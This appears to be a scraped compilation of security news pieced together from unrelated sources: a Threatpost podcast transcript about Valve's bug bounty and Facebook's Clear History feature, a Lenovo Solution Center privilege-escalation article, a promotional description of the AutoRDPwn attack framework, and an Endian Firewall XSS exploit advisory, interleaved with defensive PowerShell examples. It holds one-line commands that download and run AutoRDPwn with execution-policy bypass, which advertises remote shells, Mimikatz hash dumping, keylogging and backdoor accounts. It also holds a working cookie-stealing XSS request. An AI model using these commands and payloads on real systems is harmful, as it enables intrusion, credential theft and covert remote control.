LO: Yeah. So this was Valve. But let me take a step back. If you remember, last week, the researcher had some back and forth with Valve about the initial flaw that he had disclosed via its HackerOne bug bounty platform. And essentially, it came down to the fact that Valve didn’t consider local escalation of privilege bugs to be part of its bug bounty platform.

TS: Yeah, and we got a lot of comments that were in support of Valve’s position on that, a lot of fanboys. But go ahead.

LO: So anyways, what happened was eventually, Valve told the researcher that he was not allowed to publicly release the bug details, but he did anyways, 45 days after the initial disclosure, and then after that, the researcher said that things essentially escalated and that he was banned from the platform. That led to a big discussion around kind of disclosure in the hacker community. But you know, I guess the story, it kind of has a happy ending at this point, if Valve has admitted that it made a mistake in banning the researcher. And the other part was that it also updated its bug bounty program to now start accepting local privilege escalation class vulnerabilities.

TS: That really kind of warms my heart because there’s so much animosity between these bug bounty programs and the researchers or at least there can be and, if you were to ask me yesterday how this was going to play out or how it was playing out, I would have I would have said another bug bounty researcher standoff gone awry. I had little to no hope that that there was going to be any resolution on this. And it has been a big soap opera, really interesting stuff.

LO: It’s led to discussion around, as you said Tom, disclosure issues like these in the hacker community. And Katie Moussouris has weighed in and a couple of others, and it’s kind of been split the reactions that I’ve seen online.

TS: What’s Katie’s take on that? I’m just curious.

“Good for Valve for apologizing for the mistake in their dismissal of the vulnerabilities. Their bounty triage provider chalked it up to disclosure being a “murky process”. Basic triage is “murky”? Isn’t the outsourced service supposed to navigate that? https://t.co/Hqk4GzPWIp” — Katie Moussouris (@k8em0) August 22, 2019

LO: Yeah. I mean, she was basically pointing out how this is yet another kind of issue that we’re seeing when it comes to bug bounty programs. Because as you know, Katie, she has talked a lot about some of the hurdles that bug bounty programs kind of need to go over.

TS: Yes, she’s a very strong advocate for bug bounty programs and getting them right, that’s for sure.

LO: Yeah. So I mean, on Twitter, she did say that vendors have labeled full disclosure as irresponsible and planted onus on researchers, while completely skirting their own liability and negligence. And basically said, if the vendor failed to address it, suddenly, it’s the researcher’s fault for speaking up, and how is that fair?

TS: Yeah, I’m sure you’ve spoken to researchers that are very unhappy about bug bounty programs, they get involved in them. And they’ve got handcuffs on, they find the vulnerabilities and they’ve signed non-disclosure agreements. And the vendor sits on the vulnerability and doesn’t fix it. And the researcher wants either to get paid and get notoriety, or just wants the internet to be a safer place for things to get fixed. And they just basically have a gag order. And if they want to go public with the vulnerability, they risk the backlash, and I’m not too sure if that’s what happened in this case. But Valve and Steam, it doesn’t get much bigger in terms of an online gaming community. And, I don’t know why anybody would be sitting on a bug, a dangerous bug impacting potentially as many users as is where they use Steam, if it’s not hundreds of millions, at least 100 million.

LO: I feel like there needs to be some sort of mediator almost, between these companies, and the researchers who are participating in their programs to what level platforms like HackerOne, like a Bugcrowd play in that. But I do feel as though for something like this there, there needs to be someone who’s like, either to the vendor, like you can’t just kick someone off because they they reported something. And then on the other hand, they need someone who can go to researchers who may be having their own their own issues.

And this story is definitely split up, some are arguing that the incident points to an issue in bug bounty platforms, as I said, which is that you can’t just ban someone from the platform after they find something that you don’t like, but then others are arguing that the researcher shouldn’t have disclosed the second bug in this method by essentially going around Valve and being like, well, you banned me. So now I’m going to disclose this zero day vulnerability. But yeah, I mean, in terms of other big news this week, did you see that Facebook Clear History button news about them kind of rolling out their new Clear History feature? That was kind of interesting.

TS: Yeah. Well, I guess it doesn’t have much of an impact for folks here in the US, please yet. And it’s not anything to get too excited about either. If you know more about it, please do share. But I don’t think we can all breathe a sigh of relief quite yet in terms of Facebook and the data that they collect.

LO: As you mentioned, it sounds like this is just being rolled out in Ireland, South Korea or Spain, so like very random countries that don’t affect us here in the US. But yeah, I was reading reports and articles that were saying that while Facebook has this Clear History button that’s supposed to kind of clear all your data. And consumers were really wanting that ability to wipe out all the data that Facebook has on us. It sounds like it’s not really what people had hoped for and what they had expected. And it doesn’t really truly clear all of our history. It sounds like essentially, it just like still takes your data, but it will anonymize you so that I guess your data isn’t attached to you. But it’s still collecting your data, essentially. And I think that’s what has people riled up at this point.

TS: Yeah. And I think that by virtue of the fact that you actually push the button, it sort of red flags you as well, and it takes extra effort to anonymize you, but also to scrutinize you at the same time. And I gotta figure, this is one of those feel good things that doesn’t serve anybody but Facebook, you know, it says, Oh, we have we’ve got a button for that now, and you don’t have to worry about it, we’re going to see a lot more of these types of privacy pushes. Some of them, I know that you just wrote about something that Google’s working on as well, where you’ve got the big tech giants, who are feeling the heat from government, whether it be the US government, or foreign governments are very concerned about data privacy, and about the amount of information that’s being collected. And they’re coming up with a lot of new solutions, to try to address that situation. And I think what they’re doing is they obviously don’t want to hurt their bottom line. And they’re coming as close as they can to offering a genuine solution without actually having them hurt the billions in profit that they make every year. It’s a fine line that they’re walking, I think they’re really trying to head off a lot of the possible regulations that are coming down the pike by saying, look, we’ve got a button for that, look, we’ve got a browser extension for that.

LO: Yeah, I mean, it is interesting, because what the alternative would be is that we’re essentially consuming free content online, in return for our data. So the other option, that Facebook, that companies like Google are telling us is that we that we would have to pay instead.

TS: I don’t know, Lindsey, it’s not a black and white issue. I don’t think you’re suggesting it is. But you know, if they’re going to say you can use Google Chrome and surf the internet for free, because we can take every little tiny piece of data that we can about you and monetize it, there has to be there has to be a middle ground.
And I have I’ve heard, we’re seeing micro payments becoming a bigger reality. I’m not familiar with some of the success stories that newspapers and and other websites are having in terms of making, giving access these walled gardens that are going up, left and right. I mean, maybe, maybe, maybe that’s where we’re headed. I don’t see Facebook ever charging for access to their world or or Google Chrome. I mean, it kind of might be nice if you pay $10 a year, you don’t have to worry about being tracked as much. But I still feel like even if you paid $10 a year to Facebook, and they said they weren’t tracking you, they probably be like, oops, I’m sorry, you’re tracking you. LO: So we’re basically almost into deep at this point. TS: Yeah, I don’t know. But I just don’t buy the argument, that you’re getting it for free. So we should be able to collect every website that you go to browser fingerprints, IP address, where you do your banking, your health care provider – mean, these guys, these guys are making billions and trillions. And if they weren’t so hungry to make to keep their bottom line and might be able to figure out how to find a little more of a middle ground where they don’t have to completely suck up every little detail of your life to be able to monetize it. LO: Yeah, that’s fair. I don’t know. I think at this point like you mentioned, they’re really trying to kind of stave off regulation and who knows if that’s going to work or not at this point, because it is getting so much traction, but all right. Well, I think we’ve had a very busy week, Tom, thanks for coming on to talk a little bit more about the biggest stories that Threatpost wrote about this week. Hopefully, we’ll have a quieter weekend. TS: Yeah. Yeah, for sure. Thanks, Lindsey. LO: All right. Thanks. Catch us next week on the Threatpost podcast.

Another flaw has been found in Lenovo's decommissioned Lenovo Solution Center software, preinstalled on millions of older-model PCs made by the world's leading computer maker. The vulnerability is a privilege escalation flaw that can be used to execute arbitrary code on a targeted system, giving an adversary Administrator- or SYSTEM-level privileges. The research comes from Pen Test Partners, who found the flaw (CVE-2019-6177) and said the vulnerability is tied to Lenovo's much-maligned Lenovo Solution Center (LSC) software. "The bug itself is a DACL (discretionary access control list) overwrite, which means that a high-privileged Lenovo process indiscriminately overwrites the privileges of a file that a low-privileged user is able to control," wrote researchers at Pen Test Partners in a technical description of the bug posted Thursday. Lenovo issued a security bulletin regarding this bug and recommended users upgrade to a similar utility called Lenovo Vantage. Researchers describe the bug as giving hackers with low-privilege access to a PC the ability to write a "hardlink" file to a controllable location. This "hardlink" file would be a low-privilege "pseudo file" that could be used to point to a second, privileged file. "When the Lenovo process runs, it overwrites the privileges of the hardlinked file with permissive privileges, which lets the low-privileged user take full control of a file they shouldn't normally be allowed to," researchers wrote. "This can, if you're clever, be used to execute arbitrary code on the system with Administrator or SYSTEM privileges." The software's intended purpose is to monitor the overall health of the PC. It monitors the battery and firewall and checks for driver updates. It comes pre-installed on the majority of Lenovo PCs, desktop and laptop, for both businesses and consumers. The problematic version is 03.12.003, which Lenovo said is no longer supported. According to Lenovo, the software was originally released in 2011.
Lenovo said LSC has been "officially" designated end of life since November 2018. However, a version is still available for download via the Lenovo website. LSC has been a source of many headaches for Lenovo. In 2016, researchers found a similar escalation-of-privileges bug. In 2015, the hacking group Slipstream/RoL demonstrated a proof-of-concept attack that exploited an LSC bug that allowed a malicious web page to execute code on Lenovo PCs with system privileges. The LSC security flaw is the most recent in a long list of security fumbles that have plagued Lenovo over the past year. In February 2015, Lenovo was put in the security hot seat when researchers discovered a piece of software called Superfish that injected ads on websites and could be abused by hackers to read encrypted passwords and web-browsing data. Last August, Lenovo again landed in hot water when it was criticized for automatically downloading Lenovo Service Engine software, labeled as unwanted bloatware by many. Worse, when users removed the software, Lenovo systems were configured to download and reinstall the program without the PC owner's consent.
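The precondition of this bug class is a privileged process rewriting the DACL of a path a low-privileged user controls, where that path is really a hardlink to a protected file. The following is an added example, not code from Lenovo or Pen Test Partners, of the guard such a maintenance task should apply before touching an ACL: refuse files that carry more than one NTFS link name, refuse reparse points, and refuse files whose parent directory is writable by non-administrators. The function name, the scratch directory and the demo files are constructed for the example.

```powershell
# Added example (not Lenovo's or Pen Test Partners' code): guard a privileged
# ACL rewrite against the hardlink-in-a-user-writable-folder trick.
function Test-SafeAclTarget {
    param([Parameter(Mandatory)][string]$Path)

    $item = Get-Item -LiteralPath $Path -Force -ErrorAction Stop

    # 1. A hardlinked file has ONE security descriptor shared by every link
    #    name. Loosening the DACL through the decoy name also loosens it on the
    #    privileged file the other name points at.
    if ($item.LinkType -eq 'HardLink') {
        return [pscustomobject]@{ Safe = $false
                                  Reason = "hardlink, other names: $($item.Target -join ', ')" }
    }
    # Symlinks and junctions reach a different file by a different mechanism;
    # they are just as unsafe to operate on from a privileged context.
    if ($item.LinkType) {
        return [pscustomobject]@{ Safe = $false; Reason = "reparse point ($($item.LinkType))" }
    }

    # 2. If a low-privileged principal can write to the parent directory, the
    #    file can be swapped for a link between this check and the ACL write.
    $lowPriv = @('BUILTIN\Users', 'Everyone', 'NT AUTHORITY\Authenticated Users')
    $writeMask = [System.Security.AccessControl.FileSystemRights]::Write
    foreach ($ace in (Get-Acl -LiteralPath $item.DirectoryName).Access) {
        if ($ace.AccessControlType -eq 'Allow' -and
            $lowPriv -contains $ace.IdentityReference.Value -and
            ($ace.FileSystemRights -band $writeMask)) {
            return [pscustomobject]@{ Safe = $false
                                      Reason = "parent directory writable by $($ace.IdentityReference)" }
        }
    }
    return [pscustomobject]@{ Safe = $true; Reason = 'single-link file in a protected directory' }
}

# Demonstration on a constructed pair of files in a scratch directory.
# Creating the hardlink gives BOTH names a link count of 2, so either name
# is now reported as unsafe.
$scratch = Join-Path $env:TEMP 'dacl-demo'                       # constructed path
New-Item -ItemType Directory -Path $scratch -Force | Out-Null
Set-Content -LiteralPath "$scratch\original.txt" -Value 'data'
New-Item -ItemType HardLink -Path "$scratch\decoy.txt" -Target "$scratch\original.txt" | Out-Null
Test-SafeAclTarget "$scratch\decoy.txt"      # Safe = False, Reason starts with "hardlink"
Remove-Item -LiteralPath $scratch -Recurse -Force
```

The check narrows the window but does not close it; the durable fix is for the privileged component to never modify ACLs on paths under a standard user's control, or to do so while impersonating that user so the kernel enforces the user's own rights.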

AutoRDPwn is a post-exploitation framework created in PowerShell, designed primarily to automate the Shadow attack on Microsoft Windows computers. This vulnerability (listed as a feature by Microsoft) allows a remote attacker to view his victim's desktop without his consent, and even control it on demand, using tools native to the operating system itself. Thanks to the additional modules, it is possible to obtain a remote shell through Netcat, dump system hashes with Mimikatz, load a remote keylogger and much more. All this through a completely intuitive menu in seven different languages. Additionally, it is possible to use it in a reverse shell through a series of parameters that are described in the usage section.

Requirements

PowerShell 4.0 or higher

Changes

Version 5.0
• New logo completely redesigned from scratch
• Full translation in 7 languages: es, en, fr, de, it, ru, pt
• Remote execution through a reverse shell with UAC and AMSI bypass
• Partial support from Linux (more information in the user guide)
• Improved remote execution (an internet connection is no longer necessary on the victim)
• New section available: Backdoors and persistence
• New module available: Remote Keylogger
• New section available: Privilege escalation
• New module available: Obtain information from the operating system
• New module available: Search vulnerabilities with Sherlock
• New module available: Escalate privileges with PowerUp
• New section available: Other Modules
• New module available: Execute an external script
*The rest of the changes can be consulted in the CHANGELOG file

Use

This application can be used locally, remotely or to pivot between machines. When used remotely in a reverse shell, it is necessary to use the following parameters:

-admin / -noadmin -> Depending on the permissions we have, we will use one or the other
-nogui -> This avoids loading the menu and some colors, guaranteeing its functionality
-lang -> We will choose our language (English, Spanish, French, German, Italian, Russian or Portuguese)
-option -> As with the menu, we can choose how to launch the attack
-shadow -> We will decide if we want to see or control the remote device
-createuser -> This parameter is optional; the user AutoRDPwn (password: AutoRDPwn) will be created on the victim machine

Local execution on one line:

powershell -ep bypass "cd $env:temp; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"

Example of remote execution on one line:

powershell -ep bypass "cd $env:temp; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1 -admin -nogui -lang English -option 4 -shadow control -createuser"

The detailed usage guide can be found at the following link: https://darkbyte.net/autordpwn-la-guia-definitiva

Screenshots

Credits and Acknowledgments

This framework uses the following scripts and tools:
• Chachi-Enumerator by Luis Vacas -> https://github.com/Hackplayers/PsCabesha-tools
• Get-System by HarmJ0y & Matt Graeber -> https://github.com/HarmJ0y/Misc-PowerShell
• Invoke-DCOM by Steve Borosh -> https://github.com/rvrsh3ll/Misc-Powershell-Scripts
• Invoke-MetasploitPayload by Jared Haight -> https://github.com/jaredhaight/Invoke-MetasploitPayload
• Invoke-Phant0m by Halil Dalabasmaz -> https://github.com/hlldz/Invoke-Phant0m
• Invoke-PowerShellTcp by Nikhil "SamratAshok" Mittal -> https://github.com/samratashok/nishang
• Invoke-TheHash by Kevin Robertson -> https://github.com/Kevin-Robertson/Invoke-TheHash
• Mimikatz by Benjamin Delpy -> https://github.com/gentilkiwi/mimikatz
• PsExec by Mark Russinovich -> https://docs.microsoft.com/en-us/sysinternals/downloads/psexec
• RDP Wrapper by Stas'M Corp. -> https://github.com/stascorp/rdpwrap
• SessionGopher by Brandon Arvanaghi -> https://github.com/Arvanaghi/SessionGopher
And many more that do not fit here. Thanks to all of them and their excellent work.

Contact

This software does not offer any kind of guarantee. Its use is exclusively for educational environments and/or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it. For more information, you can contact through [email protected]

Download AutoRDPwn
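Whether a session can be shadowed "without consent", as the description above puts it, is governed by the Remote Desktop Services policy "Set rules for remote control of Remote Desktop Services user sessions", stored as the Shadow value under the Terminal Services policy key. The following audit script is an added example, not part of AutoRDPwn, that reads that value, reports what it permits, and can optionally reset it to the consent-required setting; function names are assumptions, and the value meanings follow that policy's documented options.

```powershell
# Added example (not part of AutoRDPwn): audit the RDS shadowing policy so a
# defender can see whether this host allows view/control without user consent.
$ShadowPolicyKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services'

# Values of the "Shadow" policy DWORD, per the Group Policy setting
# "Set rules for remote control of Remote Desktop Services user sessions".
$ShadowModes = @{
    0 = @{ Text = 'remote control disabled';                 Consent = $true  }
    1 = @{ Text = 'full control, user must consent';         Consent = $true  }
    2 = @{ Text = 'full control WITHOUT user consent';       Consent = $false }
    3 = @{ Text = 'view only, user must consent';            Consent = $true  }
    4 = @{ Text = 'view only WITHOUT user consent';          Consent = $false }
}

function Get-ShadowPosture {
    param([switch]$Remediate)   # set consent-required mode (1) when a no-consent mode is found

    $value = (Get-ItemProperty -Path $ShadowPolicyKey -Name Shadow -ErrorAction SilentlyContinue).Shadow
    if ($null -eq $value) {
        # No policy: Windows prompts the user before a shadow session starts.
        $mode = @{ Text = 'not configured (consent prompt applies)'; Consent = $true }
    } elseif ($ShadowModes.ContainsKey([int]$value)) {
        $mode = $ShadowModes[[int]$value]
    } else {
        $mode = @{ Text = "unknown value $value"; Consent = $false }   # treat as risky
    }

    $result = [pscustomobject]@{
        Host            = $env:COMPUTERNAME
        PolicyValue     = $value
        Meaning         = $mode.Text
        ConsentRequired = $mode.Consent
        Remediated      = $false
    }

    if (-not $mode.Consent -and $Remediate) {
        # Requires an elevated shell; domain GPO will re-apply its own value later.
        New-Item -Path $ShadowPolicyKey -Force | Out-Null
        Set-ItemProperty -Path $ShadowPolicyKey -Name Shadow -Value 1 -Type DWord
        $result.Remediated = $true
        $result.ConsentRequired = $true
    }
    return $result
}

Get-ShadowPosture | Format-List
```

Run it across a fleet (for example via Invoke-Command) and alert on ConsentRequired = False; a value of 2 or 4 is exactly what makes a silent "-shadow control" session possible.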

The NTFS driver supports a new FS control code to set a mount point, which the existing sandbox mitigation doesn't support, allowing a sandboxed application to set an arbitrary mount point symbolic link.

MD5 | 0943b5ee8bb525ed81875df4a3ae481f


Endian Firewall version 3.3.0 suffers from a cross site scripting vulnerability.

MD5 | 2dc274d1f115293fb370ca32fa329935

# Exploit Title: Endian Firewall cross-site scripting (XSS)
# Date: 08/22/2019
# Exploit Authors: Milad Soltanian + G0dfather ( @irpwn )
# Vendor Homepage: https://www.endian.com
# Version : 3.3.0

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.



1 - Log in.

2 - Open the URL below to edit the network configuration.

3 - Advance through the wizard until you reach Step 3/8: Network preferences.

4 - Put the payload in the IP address input.

[PAYLOAD] = "><!--

[EXAMPLE REQUEST]

POST /cgi-bin/netwizard.cgi HTTP/1.1
Host: 5.9.96.86:10443
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 272
Authorization: Basic YWRtaW46bWEhQCM0NTY=
Connection: close
Referer: https://192.168.1.10:10443/cgi-bin/netwizard.cgi
Cookie: en-visit=216e4cac7868d0ca041c21489faa817d1a8faca5; session_id=2fcdb768fee725b270598427fa6f4ed10f6774ca; endian_webshell=354369204
Upgrade-Insecure-Requests: 1

session_id=174960656&step=3&DHCP_ENABLE_GREEN=on&DISPLAY_GREEN_ADDRESS=%22%3E%3Cimg+src%3DaWd3l+onerror%3Dalert%28document.cookie%29%3E%3C%21--&DISPLAY_GREEN_NETMASK=24&DISPLAY_GREEN_ADDITIONAL=&GREEN_DEVICES=0&HOSTNAME=efw-82aabd1d48&DOMAINNAME=localdomain&next=%3E%3E%3E
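The root cause is that DISPLAY_GREEN_ADDRESS is reflected into the wizard's HTML unvalidated and unencoded. The following is an added defensive counterpart, not Endian's code and in PowerShell rather than the CGI's own language, showing the two layers a fix needs: an allowlist check that only accepts a dotted-quad IPv4 address (and a 0-32 prefix length for the netmask), plus HTML encoding on output so a later relaxation of validation cannot reintroduce the injection. Function names are assumptions.

```powershell
# Added example (not Endian's code): strict validation and output encoding for
# the address fields the network wizard reflects back to the browser.
function Test-DottedQuad {
    param([string]$Value)
    if ($Value -notmatch '^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$') { return $false }
    foreach ($i in 1..4) {                       # regex allows 999; enforce 0-255 per octet
        if ([int]$Matches[$i] -gt 255) { return $false }
    }
    return $true
}

function Test-PrefixLength {
    param([string]$Value)
    # -and short-circuits, so [int] is only applied to an all-digit string
    return ($Value -match '^\d{1,2}$' -and [int]$Value -le 32)
}

function Render-AddressField {
    param([string]$Address, [string]$Netmask)
    # Reject first: a bad value is never echoed back, not even encoded.
    if (-not (Test-DottedQuad $Address)) {
        return '<input name="DISPLAY_GREEN_ADDRESS" value=""><span class="error">Invalid IPv4 address</span>'
    }
    if (-not (Test-PrefixLength $Netmask)) {
        return '<input name="DISPLAY_GREEN_NETMASK" value=""><span class="error">Invalid prefix length</span>'
    }
    # Encode on output regardless: defence in depth against future validator changes.
    $a = [System.Net.WebUtility]::HtmlEncode($Address)
    $m = [System.Net.WebUtility]::HtmlEncode($Netmask)
    return "<input name=`"DISPLAY_GREEN_ADDRESS`" value=`"$a`"><input name=`"DISPLAY_GREEN_NETMASK`" value=`"$m`">"
}

# Constructed inputs: the advisory's payload versus a normal address
Render-AddressField -Address '"><!--'      -Netmask '24'   # rejected by the allowlist
Render-AddressField -Address '192.168.1.10' -Netmask '24'   # reflected, nothing to encode
Render-AddressField -Address '256.1.1.1'    -Netmask '24'   # rejected: octet out of range
```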
